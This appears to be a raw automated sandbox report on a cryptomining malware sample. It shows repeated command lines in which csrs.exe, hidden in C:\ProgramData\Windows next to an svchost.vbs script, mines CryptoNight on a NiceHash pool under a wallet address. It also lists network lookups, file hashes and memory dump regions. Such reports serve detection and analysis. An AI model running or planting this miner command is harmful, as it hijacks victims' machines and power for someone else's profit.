"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
C:\ProgramData\Windows\svchost.vbs
| MD5 | f4b667fe8d75278dffe4fa57d5b7212c |
| SHA1 | 05bc96683ea77d081fedcd810c4de7e9c5bb833a |
| SHA256 | 4f1a7ce0e5031763d94e774ce4fbe096e9ad0058abb5d209988dbf375a5ec922 |
| SHA512 | 52e2113bf234ea03c933d57030326e850847558ad7b195f74a99fa0d23e9857cb0e273a52a45602663462ee0bd9fee017e76e67b5a68c748e286b36d60ba6d41 |
C:\ProgramData\Windows\csrs.exe
| MD5 | e3427d9f439aebefa3d9c299e2a94af3 |
| SHA1 | ffff4672790378677ec30d3634fc593c10dfd37e |
| SHA256 | 7374051e75ae97ba687cd153927faccd21fcdcc0b41a42867d38ac62064f6aba |
| SHA512 | a9ffc1a3436a26b162b8933f628b6f5014b7cd5678625a479ddf6ad0ff32a50b916c2041265fa0fc6cc99fcf0c63e30eb4811cf8099cc0baf2b718647ce4160b |
memory/1716-11-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/1716-12-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/1716-21-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/2016-23-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/2016-32-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/936-34-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/936-43-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/2452-45-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/2452-54-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/4512-56-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/4512-65-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/1944-68-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/1944-76-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/1980-78-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/1980-87-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/1960-89-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/1960-98-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/4540-100-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/4540-109-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/1200-111-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/1200-120-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/2352-122-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/2352-131-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/552-133-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/552-142-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/4316-144-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/4316-153-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/5104-155-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/5104-164-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/3024-166-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/3024-175-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/4448-177-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/4448-186-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/3428-188-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/3428-197-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/2028-199-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/2028-208-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/4528-210-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/4528-219-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/4600-221-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/4600-230-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/984-232-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/984-241-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/2352-243-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/2352-252-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/2576-254-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/2576-263-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/424-265-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/424-274-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/3828-276-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/3828-285-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/2792-287-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/2792-296-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/3412-298-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/3412-307-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/3008-309-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/3008-318-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/1796-320-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/1796-329-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/4560-331-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/3288-341-0x00000000004D0000-0x000000000083B000-memory.dmp
memory/2252-351-0x00000000004D0000-0x000000000083B000-memory.dmp